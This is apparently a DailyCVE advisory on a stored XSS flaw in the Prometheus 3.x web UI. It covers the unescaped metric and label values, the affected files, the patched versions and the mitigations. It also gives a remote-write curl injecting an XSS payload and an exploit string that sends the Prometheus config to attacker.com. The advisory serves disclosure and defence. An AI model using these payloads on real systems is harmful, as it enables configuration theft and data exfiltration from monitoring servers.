Prometheus, Stored XSS, CVE-pending (Critical)

Listen to this Post

The vulnerability stems from improper sanitization of metric names and label values in Prometheus web UI components. An attacker who controls a scrape target, remote write, or OTLP receiver can inject malicious HTML/JavaScript into metric names or label values, since Prometheus v3.x allows UTF-8 characters like <, >, and ” in these fields. When a victim user views the Graph page, three code paths trigger unsafe innerHTML injection. First, in the old React UI and new Mantine UI, hovering over a chart tooltip causes unescaped metric names (labels.name) to be inserted into innerHTML. Second, in the old React UI, opening the Metric Explorer (globe icon) renders fuzzy search results via dangerouslySetInnerHTML without sanitization. Third, in the old React UI heatmap charts, hovering over a cell injects the le label value (histogram bucket boundary) into innerHTML, even though le can contain arbitrary UTF-8 strings. Exploiting this, an attacker executes JavaScript in the victim’s browser with the same origin as Prometheus. From there, they can read /api/v1/status/config (redacted secrets but still sensitive), call /-/quit to shutdown Prometheus (if –web.enable-lifecycle is set), call /api/v1/admin/tsdb/delete_series to delete metrics (if –web.enable-admin-api is set), or exfiltrate metric data. The vulnerable files include web/ui/mantine-ui/src/pages/query/uPlotChartHelpers.ts, web/ui/react-app/src/pages/graph/GraphHelpers.ts, web/ui/react-app/src/pages/graph/MetricsExplorer.tsx, and web/ui/react-app/src/vendor/flot/jquery.flot.heatmap.js. Patches in Prometheus 3.5.2 LTS and 3.11.2 apply escapeHTML() to all user-controlled values before innerHTML insertion.

dailycve form:

Platform: Prometheus
Version: 3.x before 3.5.2
Vulnerability: Stored XSS via metrics
Severity: Critical
date: 2026-04-13

Prediction: Already patched in 3.5.2

What Undercode Say:

Analytics:

Check Prometheus version
prometheus --version
Grep for vulnerable UI files
find /usr/share/prometheus -name ".js" | xargs grep -l "dangerouslySetInnerHTML|innerHTML"
Simulate malicious metric injection via remote write
curl -X POST http://target:9090/api/v1/write --data-binary @- <<EOF
metric_name{label="<img src=x onerror=alert(1)>"} 1
EOF
Monitor for XSS attempts in access logs
grep "alert(1)" /var/log/prometheus/access.log

Exploit:

Attacker sets up a malicious exporter returning metric name <img src=x onerror=fetch('/api/v1/status/config').then(r=>r.text()).then(data=>fetch('https://attacker.com?c='+btoa(data)))>. Victim views graph tooltip → script exfiltrates config.

Protection from this CVE:

Upgrade to Prometheus 3.5.2 LTS or 3.11.2+. Disable `–web.enable-remote-write-receiver` and `–web.enable-otlp-receiver` if untrusted. Never enable `–web.enable-admin-api` or `–web.enable-lifecycle` when ingesting untrusted data. Validate scrape targets. Use CSP headers to restrict script execution.

Impact:

Arbitrary JavaScript execution in Prometheus UI context. Leads to config theft, shutdown, metric deletion, data exfiltration, and potential pivot to internal networks if session cookies are accessible.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top